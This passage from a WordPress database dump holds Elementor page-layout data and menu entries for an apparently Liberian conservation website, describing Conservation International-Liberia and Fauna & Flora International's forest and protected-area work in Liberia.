Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"68c504b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0808916\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"217b7a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(13846,2214,'_elementor_edit_mode','builder'),(13847,2214,'_elementor_template_type','wp-post'),(13848,2214,'_elementor_version','2.7.5'),(13849,2214,'_wp_page_template','default'),(13850,2214,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"23bf9b5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>As an affiliate of the global organization, Conservation International-Liberia works closely with communities, private sector, the government and civil society leaders to support nature conservation.<\\/p><p>Conservation International works to spotlight and secure the critical benefits that nature provides to humanity. Since its inception, CI have helped to protect more than 6 million square kilometers (2.3 million square miles) of land and sea across more than 70 countries. Currently with offices in 29 countries and 2,000 partners worldwide, CI\\u2019s reach is truly global.<\\/p><p>Building upon a strong foundation of science, partnership and field demonstration, Conservation International empowers societies to responsibly and sustainably care for nature, our global biodiversity, for the well-being of humanity.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8526d15\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Coming up<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7c5e6ec\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Coming up<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(13867,2215,'_menu_item_type','custom'),(13868,2215,'_menu_item_menu_item_parent','0'),(13869,2215,'_menu_item_object_id','2215'),(13870,2215,'_menu_item_object','custom'),(13871,2215,'_menu_item_target','_blank'),(13872,2215,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(13873,2215,'_menu_item_xfn',''),(13874,2215,'_menu_item_url','https://www.conservation.org/'),(13876,2215,'_menu_item_template',''),(13877,2215,'_menu_item_mega_template','0'),(13878,2215,'_menu_item_nolink',''),(13879,2215,'_menu_item_category_post',''),(13880,2215,'_menu_item_megamenu',''),(13881,2215,'_menu_item_megamenu_auto_width',''),(13882,2215,'_menu_item_megamenu_col',''),(13883,2215,'_menu_item_megamenu_heading',''),(13884,2215,'_menu_item_megamenu_widgetarea','0'),(13885,2215,'_menu_item_icon',''),(13886,2216,'_menu_item_type','custom'),(13887,2216,'_menu_item_menu_item_parent','0'),(13888,2216,'_menu_item_object_id','2216'),(13889,2216,'_menu_item_object','custom'),(13890,2216,'_menu_item_target','_blank'),(13891,2216,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(13892,2216,'_menu_item_xfn',''),(13893,2216,'_menu_item_url','https://www.facebook.com/Conservationliberia/'),(13895,2216,'_menu_item_template',''),(13896,2216,'_menu_item_mega_template','0'),(13897,2216,'_menu_item_nolink',''),(13898,2216,'_menu_item_category_post',''),(13899,2216,'_menu_item_megamenu',''),(13900,2216,'_menu_item_megamenu_auto_width',''),(13901,2216,'_menu_item_megamenu_col',''),(13902,2216,'_menu_item_megamenu_heading',''),(13903,2216,'_menu_item_megamenu_widgetarea','0'),(13904,2216,'_menu_item_icon',''),(13905,2215,'_elementor_controls_usage','a:0:{}'),(13906,2216,'_elementor_controls_usage','a:0:{}'),(13907,2217,'_menu_item_type','custom'),(13908,2217,'_menu_item_menu_item_parent','0'),(13909,2217,'_menu_item_object_id','2217'),(13910,2217,'_menu_item_object','custom'),(13911,2217,'_menu_item_target','_blank'),(13912,2217,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(13913,2217,'_menu_item_xfn',''),(13914,2217,'_menu_item_url','https://www.fauna-flora.org/countries/liberia'),(13916,2217,'_menu_item_template',''),(13917,2217,'_menu_item_mega_template','0'),(13918,2217,'_menu_item_nolink',''),(13919,2217,'_menu_item_category_post',''),(13920,2217,'_menu_item_megamenu',''),(13921,2217,'_menu_item_megamenu_auto_width',''),(13922,2217,'_menu_item_megamenu_col',''),(13923,2217,'_menu_item_megamenu_heading',''),(13924,2217,'_menu_item_megamenu_widgetarea','0'),(13925,2217,'_menu_item_icon',''),(13926,2218,'_menu_item_type','custom'),(13927,2218,'_menu_item_menu_item_parent','0'),(13928,2218,'_menu_item_object_id','2218'),(13929,2218,'_menu_item_object','custom'),(13930,2218,'_menu_item_target','_blank'),(13931,2218,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(13932,2218,'_menu_item_xfn',''),(13933,2218,'_menu_item_url','http://www.liberianfaunaflora.org/'),(13935,2218,'_menu_item_template',''),(13936,2218,'_menu_item_mega_template','0'),(13937,2218,'_menu_item_nolink',''),(13938,2218,'_menu_item_category_post',''),(13939,2218,'_menu_item_megamenu',''),(13940,2218,'_menu_item_megamenu_auto_width',''),(13941,2218,'_menu_item_megamenu_col',''),(13942,2218,'_menu_item_megamenu_heading',''),(13943,2218,'_menu_item_megamenu_widgetarea','0'),(13944,2218,'_menu_item_icon',''),(13945,2217,'_elementor_controls_usage','a:0:{}'),(13946,2218,'_elementor_controls_usage','a:0:{}'),(13947,2219,'_menu_item_type','custom'),(13948,2219,'_menu_item_menu_item_parent','0'),(13949,2219,'_menu_item_object_id','2219'),(13950,2219,'_menu_item_object','custom'),(13951,2219,'_menu_item_target','_blank'),(13952,2219,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(13953,2219,'_menu_item_xfn',''),(13954,2219,'_menu_item_url','http://www.mpw.gov.lr/'),(13956,2219,'_menu_item_template',''),(13957,2219,'_menu_item_mega_template','0'),(13958,2219,'_menu_item_nolink',''),(13959,2219,'_menu_item_category_post',''),(13960,2219,'_menu_item_megamenu',''),(13961,2219,'_menu_item_megamenu_auto_width',''),(13962,2219,'_menu_item_megamenu_col',''),(13963,2219,'_menu_item_megamenu_heading',''),(13964,2219,'_menu_item_megamenu_widgetarea','0'),(13965,2219,'_menu_item_icon',''),(13967,2220,'_elementor_edit_mode','builder'),(13968,2220,'_elementor_template_type','wp-post'),(13969,2220,'_elementor_version','2.7.5'),(13970,2220,'_wp_page_template','default'),(13971,2220,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"23bf9b5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>As an affiliate of the global organization, Conservation International-Liberia works closely with communities, private sector, the government and civil society leaders to support nature conservation.<\\/p><p>Conservation International works to spotlight and secure the critical benefits that nature provides to humanity. Since its inception, CI have helped to protect more than 6 million square kilometers (2.3 million square miles) of land and sea across more than 70 countries. Currently with offices in 29 countries and 2,000 partners worldwide, CI\\u2019s reach is truly global.<\\/p><p>Building upon a strong foundation of science, partnership and field demonstration, Conservation International empowers societies to responsibly and sustainably care for nature, our global biodiversity, for the well-being of humanity.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8526d15\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Coming up<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7c5e6ec\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Coming up<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(13972,2220,'_elementor_controls_usage','a:4:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:3;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:2;s:21:\"typography_typography\";i:2;s:20:\"typography_font_size\";i:2;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:3;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:1;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:1;}}}}}'),(13978,2222,'_elementor_edit_mode','builder'),(13979,2222,'_elementor_template_type','wp-post'),(13980,2222,'_elementor_version','2.7.5'),(13981,2222,'_wp_page_template','default'),(13982,2222,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a3e5fad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Fauna &amp; Flora International (FFI) began working in Liberia in 1997 and we played a crucial role, together with our partners, in re-establishing operations in the country\\u2019s oldest protected area \\u2013 Sapo National Park \\u2013 after years of civil conflict.<\\/p><p>Drawing on this work in Sapo, we have since worked closely with our partners to help identify and prioritise sites for a protected area network across Liberia and establish the foundations for sustainable forest and environmental management.<\\/p><p>We are also working extensively to improve collaboration between local, national, regional and private stakeholders across various sectors and national boundaries to reduce threats to biodiversity from subsistence pressures, oil palm operations and large-scale mining operations.<\\/p><p>Recognising the value of Liberian forests for carbon storage, biodiversity conservation and community well-being, we are also playing a lead role in the development of REDD+ project sites in the country.<\\/p><p>Community involvement in decision making is central to strengthening forest management and governance in a post-conflict Liberia, and we have supported a range of activities to ensure that communities within and surrounding East Nimba Nature Reserve, Wonegizi and Wologizi Proposed Protected Areas, and Sapo National Park are properly supported to engage in protected area management and conservation.<\\/p><p>FFI is also supporting Liberia\\u2019s up-and-coming conservationists by helping to build conservation capacity at a national level \\u2013 something that is currently limited due to a lack of practical and academic training opportunities. FFI is tackling these challenges by developing appropriate infrastructure and training courses, including university-level teaching as well as practical skills training such as biomonitoring, and conservation management skills such as proposal writing and grant management.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fd366d6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Coming up\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9b3912\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"da4845a\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"9b6c777\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c8fb205\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false}]'),(13986,2223,'_elementor_edit_mode','builder'),(13987,2223,'_elementor_template_type','wp-post'),(13988,2223,'_elementor_version','2.7.5'),(13989,2223,'_wp_page_template','default'),(13990,2223,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a3e5fad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Fauna &amp; Flora International (FFI) began working in Liberia in 1997 and we played a crucial role, together with our partners, in re-establishing operations in the country\\u2019s oldest protected area \\u2013 Sapo National Park \\u2013 after years of civil conflict.<\\/p><p>Drawing on this work in Sapo, we have since worked closely with our partners to help identify and prioritise sites for a protected area network across Liberia and establish the foundations for sustainable forest and environmental management.<\\/p><p>We are also working extensively to improve collaboration between local, national, regional and private stakeholders across various sectors and national boundaries to reduce threats to biodiversity from subsistence pressures, oil palm operations and large-scale mining operations.<\\/p><p>Recognising the value of Liberian forests for carbon storage, biodiversity conservation and community well-being, we are also playing a lead role in the development of REDD+ project sites in the country.<\\/p><p>Community involvement in decision making is central to strengthening forest management and governance in a post-conflict Liberia, and we have supported a range of activities to ensure that communities within and surrounding East Nimba Nature Reserve, Wonegizi and Wologizi Proposed Protected Areas, and Sapo National Park are properly supported to engage in protected area management and conservation.<\\/p><p>FFI is also supporting Liberia\\u2019s up-and-coming conservationists by helping to build conservation capacity at a national level \\u2013 something that is currently limited due to a lack of practical and academic training opportunities. FFI is tackling these challenges by developing appropriate infrastructure and training courses, including university-level teaching as well as practical skills training such as biomonitoring, and conservation management skills such as proposal writing and grant management.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fd366d6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Coming up\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"08f63c0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Coming 